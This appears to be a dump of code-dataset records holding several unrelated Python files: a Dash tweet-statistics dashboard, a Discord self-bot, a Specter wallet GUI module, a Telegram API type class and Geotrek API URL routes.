'CountingChickens'\n\nfrom dash import Dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport dash_table\n\nimport pandas as pd\n\nfrom flask import Flask, render_template, request, session, make_response\n\napp = Flask(__name__) # '__main__'\n\n\napp_dash = Dash(__name__,\n server=app,\n url_base_pathname='/')\n\n\npath='data/'\n\ndf_tpc=pd.read_csv(f'{path}AI_topics.csv', index_col=0)\nselected_topics=[tpc.lower() for tpc in df_tpc.index.values]\n\ndf_aut=pd.read_csv(f'{path}AI_authors.csv', index_col=0)\ndf_tim=pd.read_csv(f'{path}AI_time.csv', index_col=0)\ndf_txt=pd.read_csv(f'{path}AI_body.csv', index_col=0)\ndf_txt=df_txt.rename(columns={'Favorite Count': 'Favs','Retweet Count': 'RT'})\ncols_from_txt=list(df_txt.columns.values)\ncols_from_txt.remove('Place')\ncols_from_txt.remove('Id Str')\ncols_from_txt.remove('Url')\ncols_from_txt.remove('Mentions')\ncols_from_txt.remove('Hashtags')\ndf_txt['Hashtags_lower']=df_txt.Hashtags.apply(lambda x: [z.lower() for z in eval(x)])\n#df_txt['Hashtags']=df_txt.Hashtags.apply(lambda x: ', '.join([\"#\" + z for z in eval(x)]))\n#df_txt['Url']=df_txt.Url.apply(lambda x: ', '.join([z for z in eval(x)]))\n#df_txt['Mentions']=df_txt.Mentions.apply(lambda x: ', '.join([\"@\" + z for z in eval(x)]))\n\napp_dash.layout = html.Div(id='dash-container',\n children=[\n\n html.Div(\n [dcc.Graph(\n style={'height': 300},\n id='bar-mentions-counts',\n figure=dict(\n data= [\n {'x': list(df_tpc.index.values), 'y': list(df_tpc.Mentions.values), 'type': 'bar', 'name': 'Nr Tweets'}\n ],\n layout=dict(\n title='Top 50 Hashtags for #AI',\n showlegend=True,\n legend=dict(\n x=0,\n y=1.0\n ),\n margin=dict(l=40, r=0, t=40, b=80)\n )\n )\n )] ,\n #style={'width': '25%', 'display': 'inline-block'}\n ), \n html.Div(\n [dcc.Graph(\n style={'height': 300},\n id='my-graph'\n )] ,\n style={'width': '70%', 'display': 'inline-block'}\n ), \n html.Div(\n [dcc.Graph(\n style={'height': 300},\n id='bar-authors-counts',\n )] ,\n style={'width': '30%', 'display': 'inline-block'}\n ), \n html.H1('',''),\n html.Div(\n [dash_table.DataTable(\n id='nws-table',\n columns=[{\"name\": i, \"id\": i} for i in cols_from_txt],\n #fixed_rows={'headers': True},\n style_cell={'textAlign': 'left'},\n style_data={\n 'whiteSpace': 'normal',\n 'height': 'auto'\n },\n style_as_list_view=True,\n style_data_conditional=[\n {\n 'if': {'row_index': 'odd'},\n 'backgroundColor': 'rgb(248, 248, 248)'\n }\n ],\n style_header={\n 'backgroundColor': 'rgb(230, 230, 230)',\n 'fontWeight': 'bold'\n }\n )]\n )\n ])\n\n@app_dash.callback(Output('my-graph', 'figure'),\n [Input('bar-mentions-counts', 'clickData')])\ndef update_figure(list_from_click):\n '''\n if isinstance(list_of_stocks,str):\n list_of_stocks=[list_of_stocks]\n \n if list_from_click:\n '''\n \n if list_from_click:\n list_of_topics=[clk['x'] for clk in list_from_click['points']]\n else:\n list_of_topics=['ai']\n\n data=[\n dict(\n x=list(df_tim[df_tim.term==hashtag.lower()].time.values),\n y=list(df_tim[df_tim.term==hashtag.lower()].id.values),\n name=hashtag,\n ) for hashtag in list_of_topics\n ]\n return dict(\n data=data\n ,\n layout=dict(\n title='Mentions over time',\n showlegend=True,\n legend=dict(\n x=0,\n y=1.0\n ),\n xaxis=dict(type='category',nticks=15),\n xaxis_tickformat ='%Y-%m-%d', \n margin=dict(l=40, r=0, t=40, b=70), \n )\n )\n\n@app_dash.callback(Output('bar-authors-counts', 'figure'),\n [Input('bar-mentions-counts', 'clickData')])\ndef update_bar_authors(list_from_click):\n\n if list_from_click:\n list_of_topics=[clk['x'] for clk in list_from_click['points']]\n else:\n list_of_topics=['ai']\n authors_limit=30\n data=[\n dict(\n x=list(df_aut[df_aut.term==hashtag.lower()].original_user.iloc[:authors_limit].values),\n y=list(df_aut[df_aut.term==hashtag.lower()].id.iloc[:authors_limit].values),\n type='bar',\n name='#'+hashtag,\n ) for hashtag in list_of_topics\n ]\n return dict(\n data= data,\n layout=dict(\n title='Nr Tweets by Author per Hashatag',\n showlegend=True,\n legend=dict(\n x=0,\n y=1.0\n ),\n margin=dict(l=40, r=0, t=40, b=80)\n )\n )\n\n\n@app_dash.callback(Output('nws-table', 'data'),\n [Input('bar-mentions-counts', 'clickData')])\ndef update_table(list_from_click):\n\n if list_from_click:\n list_of_stocks=[clk['x'].lower() for clk in list_from_click['points']]\n else:\n list_of_stocks=['ai']\n\n df_out=df_txt.copy()\n indicator=df_txt['Hashtags_lower'].apply(lambda x: len(set(x) & set(list_of_stocks))>0).values\n df_out=df_out[indicator].sort_values('Favs', ascending=False)\n df_out=df_out[cols_from_txt]\n \n return df_out.to_dict('records')\n\n\n@app.route(\"/dash\")\ndef MyDashApp():\n return app_dash.index()\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)\n", "sub_path": "old/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 7337, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.Flask", "line_number": 17, "usage_type": "call"}, {"api_name": "dash.Dash", "line_number": 20, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 27, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 30, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 31, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 32, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 45, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 48, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 49, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 69, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 70, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 76, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 77, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 83, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 84, "usage_type": "call"}, {"api_name": "dash_table.DataTable", "line_number": 85, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 109, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 110, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 147, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 148, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 178, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 179, "usage_type": "call"}]} +{"seq_id": "417911223", "text": "from discord import Embed\nfrom discord.errors import HTTPException\nfrom discord.ext.commands import Bot\n\nfrom util import misc\n\nbot = Bot(command_prefix=\"self_\", self_bot=True)\n\n\n@bot.event\nasync def on_ready():\n print('Logged in as')\n print(bot.user.name)\n print(bot.user.id)\n print('------')\n\n extensions = ['cogs.base',\n 'cogs.chart',\n 'cogs.owner',\n 'cogs.server',\n 'cogs.stars']\n for extension in extensions:\n try:\n bot.load_extension(extension)\n except Exception as e:\n print('Failed to load extension {}.'.format(extension))\n print(e)\n\n\n@bot.event\nasync def on_message(message):\n try:\n await bot.process_commands(message)\n except HTTPException as err:\n await message.channel.send(err)\n raise\n\n\n@bot.event\nasync def on_reaction_add(reaction, user):\n if user.id == bot.user.id:\n # print(\"Reaction at \" + datetime.now().strftime(\"%H:%M:%S\"))\n global reaction_text\n if reaction.emoji == '\\U0001F643' and reaction_text != '':\n await reaction.message.remove_reaction(reaction.emoji, user)\n for a in reaction_text.lower():\n if a.isalpha():\n emoji = misc.get_alpha_emoji(a)\n await reaction.message.add_reaction(emoji)\n reaction_text = ''\n\n\n@bot.command()\nasync def prime(ctx, *, react: str = None):\n if react is not None:\n global reaction_text\n reaction_text = react\n # await bot.edit_message(ctx.message, 'Reaction primed. Trigger with \\U0001F643')\n # await asyncio.sleep(1)\n await ctx.message.delete()\n\n\n@bot.command()\nasync def unprime(ctx):\n global reaction_text\n reaction_text = \"\"\n await ctx.message.delete()\n\n\n@bot.command()\nasync def embed(ctx):\n split = ctx.message.content.split(\" \", 1)\n if len(split) > 1:\n parts = split[1].split(\" | \")\n if len(parts) == 3:\n em = Embed(title=parts[0], color=0xff0000)\n em.add_field(name=parts[1], value=parts[2])\n await ctx.send(embed=em)\n if len(parts) == 4:\n em = Embed(title=parts[0], color=int(parts[3]))\n em.add_field(name=parts[1], value=parts[2])\n await ctx.send(embed=em)\n await ctx.message.delete()\n\n\nwith open('selftoken.txt', 'r') as token_file:\n token = token_file.readline().strip()\nbot.run(token, bot=False)\n", "sub_path": "Self_Bot.py", "file_name": "Self_Bot.py", "file_ext": "py", "file_size_in_byte": 2482, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "discord.ext.commands.Bot", "line_number": 7, "usage_type": "call"}, {"api_name": "discord.errors.HTTPException", "line_number": 34, "usage_type": "name"}, {"api_name": "util.misc.get_alpha_emoji", "line_number": 48, "usage_type": "call"}, {"api_name": "util.misc", "line_number": 48, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 76, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 80, "usage_type": "call"}]} +{"seq_id": "648487715", "text": "from .async_gui import AsyncGUI\nfrom .screens import (Screen, PinScreen, Progress,\n MnemonicScreen, NewMnemonicScreen, RecoverMnemonicScreen,\n DevSettings)\nimport rng, asyncio\n\nclass SpecterGUI(AsyncGUI):\n \"\"\"Specter-related GUI\"\"\"\n async def get_pin(self, title=\"Enter your PIN code\", get_word=None):\n \"\"\"\n Async version of the PIN screen.\n Waits for an event that is set in the callback.\n \"\"\"\n pin_scr = PinScreen(title=title, \n note=\"Do you recognize these words?\", \n get_word=get_word)\n await self.load_screen(pin_scr)\n return await pin_scr.result()\n\n async def setup_pin(self, get_word=None):\n \"\"\"\n PIN setup screen - first choose, then confirm\n If PIN codes are the same -> return the PIN\n If not -> try again\n \"\"\"\n pin_scr = PinScreen(title=\"Choose your PIN code\", \n note=\"Remember these words, they will stay the same on this device.\", \n get_word=get_word)\n await self.load_screen(pin_scr)\n \n pin1 = await pin_scr.result()\n\n pin_scr.reset()\n pin_scr.title.set_text(\"Confirm your PIN code\")\n pin2 = await pin_scr.result()\n\n # check if PIN is the same\n if pin1 == pin2:\n return pin1\n # if not - show an error\n await self.error(\"PIN codes are different!\")\n return await self.setup_pin(get_word)\n\n async def show_mnemonic(self, mnemonic:str):\n \"\"\"\n Shows mnemonic on the screen\n \"\"\"\n scr = MnemonicScreen(mnemonic)\n await self.load_screen(scr)\n return await scr.result()\n\n async def new_mnemonic(self, generator):\n \"\"\"\n Generates a new mnemonic and shows it on the screen\n \"\"\"\n scr = NewMnemonicScreen(generator)\n await self.load_screen(scr)\n return await scr.result()\n\n async def recover(self, checker=None, lookup=None):\n \"\"\"\n Asks the user for his recovery phrase.\n checker(mnemonic) - a function that validates recovery phrase\n lookup(word, num_candidates) - a function that \n returns num_candidates words starting with word\n \"\"\"\n scr = RecoverMnemonicScreen(checker, lookup)\n await self.load_screen(scr)\n return await scr.result()\n\n def set_network(self, net):\n \"\"\"Changes color of the top line on all screens to network color\"\"\"\n Screen.network = net\n\n async def show_progress(self, host, title, message):\n \"\"\"\n Shows progress screen and cancel button \n to cancel communication with the host\n \"\"\"\n scr = Progress(title, message, button_text=\"Cancel\")\n await self.open_popup(scr)\n asyncio.create_task(self.coro(host, scr))\n\n async def coro(self, host, scr):\n \"\"\"\n Waits for one of two events:\n - either user presses something on the screen\n - or host finishes processing\n Also updates progress screen\n \"\"\"\n while host.in_progress and scr.waiting:\n await asyncio.sleep_ms(30)\n scr.tick(5)\n scr.set_progress(host.progress)\n if host.in_progress:\n host.abort()\n if scr.waiting:\n scr.waiting = False\n await self.close_popup()\n\n async def devscreen(self, dev=False, usb=False):\n scr = DevSettings(dev=dev, usb=usb)\n await self.load_screen(scr)\n return await scr.result()\n", "sub_path": "src/gui/specter.py", "file_name": "specter.py", "file_ext": "py", "file_size_in_byte": 3533, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "async_gui.AsyncGUI", "line_number": 7, "usage_type": "name"}, {"api_name": "screens.PinScreen", "line_number": 14, "usage_type": "call"}, {"api_name": "screens.PinScreen", "line_number": 26, "usage_type": "call"}, {"api_name": "screens.MnemonicScreen", "line_number": 48, "usage_type": "call"}, {"api_name": "screens.NewMnemonicScreen", "line_number": 56, "usage_type": "call"}, {"api_name": "screens.RecoverMnemonicScreen", "line_number": 67, "usage_type": "call"}, {"api_name": "screens.Screen.network", "line_number": 73, "usage_type": "attribute"}, {"api_name": "screens.Screen", "line_number": 73, "usage_type": "name"}, {"api_name": "screens.Progress", "line_number": 80, "usage_type": "call"}, {"api_name": "asyncio.create_task", "line_number": 82, "usage_type": "call"}, {"api_name": "asyncio.sleep_ms", "line_number": 92, "usage_type": "call"}, {"api_name": "screens.DevSettings", "line_number": 102, "usage_type": "call"}]} +{"seq_id": "137698149", "text": "\n\nfrom ..utils import Object\n\n\nclass ChatInviteLinkInfo(Object):\n \"\"\"\n Contains information about a chat invite link\n\n Attributes:\n ID (:obj:`str`): ``ChatInviteLinkInfo``\n\n Args:\n chat_id (:obj:`int`):\n Chat identifier of the invite link; 0 if the user is not a member of this chat\n type (:class:`telegram.api.types.ChatType`):\n Contains information about the type of the chat\n title (:obj:`str`):\n Title of the chat\n photo (:class:`telegram.api.types.chatPhoto`):\n Chat photo; may be null\n member_count (:obj:`int`):\n Number of members in the chat\n member_user_ids (List of :obj:`int`):\n User identifiers of some chat members that may be known to the current user\n is_public (:obj:`bool`):\n True, if the chat is a public supergroup or channel, ieit has a username or it is a location-based supergroup\n\n Returns:\n ChatInviteLinkInfo\n\n Raises:\n :class:`telegram.Error`\n \"\"\"\n ID = \"chatInviteLinkInfo\"\n\n def __init__(self, chat_id, type, title, photo, member_count, member_user_ids, is_public, **kwargs):\n \n self.chat_id = chat_id # int\n self.type = type # ChatType\n self.title = title # str\n self.photo = photo # ChatPhoto\n self.member_count = member_count # int\n self.member_user_ids = member_user_ids # list of int\n self.is_public = is_public # bool\n\n @staticmethod\n def read(q: dict, *args) -> \"ChatInviteLinkInfo\":\n chat_id = q.get('chat_id')\n type = Object.read(q.get('type'))\n title = q.get('title')\n photo = Object.read(q.get('photo'))\n member_count = q.get('member_count')\n member_user_ids = q.get('member_user_ids')\n is_public = q.get('is_public')\n return ChatInviteLinkInfo(chat_id, type, title, photo, member_count, member_user_ids, is_public)\n", "sub_path": "pytglib/api/types/chat_invite_link_info.py", "file_name": "chat_invite_link_info.py", "file_ext": "py", "file_size_in_byte": 1954, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "utils.Object", "line_number": 6, "usage_type": "name"}, {"api_name": "utils.Object.read", "line_number": 50, "usage_type": "call"}, {"api_name": "utils.Object", "line_number": 50, "usage_type": "name"}, {"api_name": "utils.Object.read", "line_number": 52, "usage_type": "call"}, {"api_name": "utils.Object", "line_number": 52, "usage_type": "name"}]} +{"seq_id": "446799355", "text": "from django.conf import settings\nfrom django.urls import path, include\nfrom django.views.generic import RedirectView\nfrom rest_framework import routers\n\nfrom geotrek.api.v2 import views as api_views\nfrom geotrek.api.v2.viewsets import get_geotrek_version\n\n\nrouter = routers.DefaultRouter()\nrouter.register('structure', api_views.StructureViewSet, basename='structure')\nrouter.register('portal', api_views.TargetPortalViewSet, basename='portal')\nrouter.register('theme', api_views.ThemeViewSet, basename='theme')\nrouter.register('source', api_views.SourceViewSet, basename='source')\nrouter.register('reservationsystem', api_views.ReservationSystemViewSet, basename='reservationsystem')\nrouter.register('label', api_views.LabelViewSet, basename='label')\nrouter.register('organism', api_views.OrganismViewSet, basename='organism')\nif 'geotrek.core' in settings.INSTALLED_APPS:\n router.register('path', api_views.PathViewSet, basename='path')\nif 'geotrek.feedback' in settings.INSTALLED_APPS:\n router.register('feedback_status', api_views.ReportStatusViewSet, basename='feedback-status')\n router.register('feedback_category', api_views.ReportCategoryViewSet, basename='feedback-category')\n router.register('feedback_activity', api_views.ReportActivityViewSet, basename='feedback-activity')\n router.register('feedback_magnitude', api_views.ReportProblemMagnitudeViewSet, basename='feedback-magnitude')\nif 'geotrek.trekking' in settings.INSTALLED_APPS:\n router.register('trek', api_views.TrekViewSet, basename='trek')\n router.register('poi', api_views.POIViewSet, basename='poi')\n router.register('poi_type', api_views.POITypeViewSet, basename='poitype')\n router.register('tour', api_views.TourViewSet, basename='tour')\n router.register('trek_accessibility', api_views.AccessibilityViewSet, basename='accessibility')\n router.register('trek_route', api_views.RouteViewSet, basename='route')\n router.register('trek_difficulty', api_views.DifficultyViewSet, basename='difficulty')\n router.register('trek_network', api_views.NetworkViewSet, basename='network')\n router.register('trek_practice', api_views.PracticeViewSet, basename='practice')\n router.register('weblink_category', api_views.WebLinkCategoryViewSet, basename='weblink-category')\nif 'geotrek.tourism' in settings.INSTALLED_APPS:\n router.register('touristiccontent_category', api_views.TouristicContentCategoryViewSet,\n basename='touristiccontentcategory')\n router.register('touristiccontent', api_views.TouristicContentViewSet, basename='touristiccontent')\n router.register('touristicevent', api_views.TouristicEventViewSet, basename='touristicevent')\n router.register('touristicevent_type', api_views.TouristicEventTypeViewSet, basename='touristiceventtype')\n router.register('informationdesk', api_views.InformationDeskViewSet, basename='informationdesk')\nif 'geotrek.sensitivity' in settings.INSTALLED_APPS:\n router.register('sensitivearea', api_views.SensitiveAreaViewSet, basename='sensitivearea')\n router.register('sensitivearea_practice', api_views.SportPracticeViewSet, basename='sportpractice')\n router.register('sensitivearea_species', api_views.SpeciesViewSet, basename='species')\nif 'geotrek.zoning' in settings.INSTALLED_APPS:\n router.register('city', api_views.CityViewSet, basename='city')\n router.register('district', api_views.DistrictViewSet, basename='district')\nif 'geotrek.outdoor' in settings.INSTALLED_APPS:\n router.register('outdoor_site', api_views.SiteViewSet, basename='site')\n router.register('outdoor_practice', api_views.OutdoorPracticeViewSet, basename='outdoor-practice')\n router.register('outdoor_sitetype', api_views.SiteTypeViewSet, basename='sitetype')\n router.register('outdoor_ratingscale', api_views.RatingScaleViewSet, basename='ratingscale')\n router.register('outdoor_rating', api_views.RatingViewSet, basename='rating')\n router.register('outdoor_course', api_views.CourseViewSet, basename='course')\nif 'geotrek.flatpages' in settings.INSTALLED_APPS:\n router.register('flatpage', api_views.FlatPageViewSet, basename='flatpage')\n\napp_name = 'apiv2'\n_urlpatterns = []\nif 'drf_yasg' in settings.INSTALLED_APPS:\n _urlpatterns.append(path('', api_views.schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'))\n_urlpatterns += [\n path('config/', api_views.ConfigView.as_view(), name='config'),\n path('sportpractice/', RedirectView.as_view(pattern_name='apiv2:sportpractice-list', permanent=True)),\n path('sportpractice//', RedirectView.as_view(pattern_name='apiv2:sportpractice-detail', permanent=True)),\n path('', include(router.urls)),\n path('version', get_geotrek_version)\n]\nurlpatterns = [path('api/v2/', include(_urlpatterns))]\n", "sub_path": "geotrek/api/v2/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 4781, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "rest_framework.routers.DefaultRouter", "line_number": 10, "usage_type": "call"}, {"api_name": "rest_framework.routers", "line_number": 10, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.StructureViewSet", "line_number": 11, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 11, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.TargetPortalViewSet", "line_number": 12, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 12, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.ThemeViewSet", "line_number": 13, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 13, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.SourceViewSet", "line_number": 14, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 14, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.ReservationSystemViewSet", "line_number": 15, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 15, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.LabelViewSet", "line_number": 16, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 16, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.OrganismViewSet", "line_number": 17, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 17, "usage_type": "name"}, {"api_name": "django.conf.settings.INSTALLED_APPS", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 18, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.PathViewSet", "line_number": 19, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 19, "usage_type": "name"}, {"api_name": "django.conf.settings.INSTALLED_APPS", "line_number": 20, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 20, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.ReportStatusViewSet", "line_number": 21, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 21, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.ReportCategoryViewSet", "line_number": 22, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 22, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.ReportActivityViewSet", "line_number": 23, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 23, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.ReportProblemMagnitudeViewSet", "line_number": 24, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 24, "usage_type": "name"}, {"api_name": "django.conf.settings.INSTALLED_APPS", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 25, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.TrekViewSet", "line_number": 26, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 26, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.POIViewSet", "line_number": 27, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 27, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.POITypeViewSet", "line_number": 28, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 28, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.TourViewSet", "line_number": 29, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 29, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.AccessibilityViewSet", "line_number": 30, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 30, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.RouteViewSet", "line_number": 31, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 31, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.DifficultyViewSet", "line_number": 32, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 32, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.NetworkViewSet", "line_number": 33, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 33, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.PracticeViewSet", "line_number": 34, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 34, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.WebLinkCategoryViewSet", "line_number": 35, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 35, "usage_type": "name"}, {"api_name": "django.conf.settings.INSTALLED_APPS", "line_number": 36, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 36, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.TouristicContentCategoryViewSet", "line_number": 37, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 37, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.TouristicContentViewSet", "line_number": 39, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 39, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.TouristicEventViewSet", "line_number": 40, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 40, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.TouristicEventTypeViewSet", "line_number": 41, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 41, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.InformationDeskViewSet", "line_number": 42, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 42, "usage_type": "name"}, {"api_name": "django.conf.settings.INSTALLED_APPS", "line_number": 43, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 43, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.SensitiveAreaViewSet", "line_number": 44, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 44, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.SportPracticeViewSet", "line_number": 45, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 45, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.SpeciesViewSet", "line_number": 46, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 46, "usage_type": "name"}, {"api_name": "django.conf.settings.INSTALLED_APPS", "line_number": 47, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 47, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.CityViewSet", "line_number": 48, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 48, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.DistrictViewSet", "line_number": 49, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 49, "usage_type": "name"}, {"api_name": "django.conf.settings.INSTALLED_APPS", "line_number": 50, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 50, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.SiteViewSet", "line_number": 51, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 51, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.OutdoorPracticeViewSet", "line_number": 52, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 52, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.SiteTypeViewSet", "line_number": 53, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 53, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.RatingScaleViewSet", "line_number": 54, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 54, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.RatingViewSet", "line_number": 55, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 55, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.CourseViewSet", "line_number": 56, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 56, "usage_type": "name"}, {"api_name": "django.conf.settings.INSTALLED_APPS", "line_number": 57, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 57, "usage_type": "name"}, {"api_name": "geotrek.api.v2.views.FlatPageViewSet", "line_number": 58, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 58, "usage_type": "name"}, {"api_name": "django.conf.settings.INSTALLED_APPS", "line_number": 62, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 62, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 63, "usage_type": "call"}, {"api_name": "geotrek.api.v2.views.schema_view.with_ui", "line_number": 63, "usage_type": "call"}, {"api_name": "geotrek.api.v2.views.schema_view", "line_number": 63, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 63, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 65, "usage_type": "call"}, {"api_name": "geotrek.api.v2.views.ConfigView.as_view", "line_number": 65, "usage_type": "call"}, {"api_name": "geotrek.api.v2.views.ConfigView", "line_number": 65, "usage_type": "attribute"}, {"api_name": "geotrek.api.v2.views", "line_number": 65, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 66, "usage_type": "call"}, {"api_name": "django.views.generic.RedirectView.as_view", "line_number": 66, "usage_type": "call"}, {"api_name": "django.views.generic.RedirectView", "line_number": 66, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 67, "usage_type": "call"}, {"api_name": "django.views.generic.RedirectView.as_view", "line_number": 67, "usage_type": "call"}, {"api_name": "django.views.generic.RedirectView", "line_number": 67, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 68, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 68, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 69, "usage_type": "call"}, {"api_name": "geotrek.api.v2.viewsets.get_geotrek_version", "line_number": 69, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 71, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "436696749", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 26 10:21:49 2019\n\n@author: Administrator\n\"\"\"\nimport requests\nimport 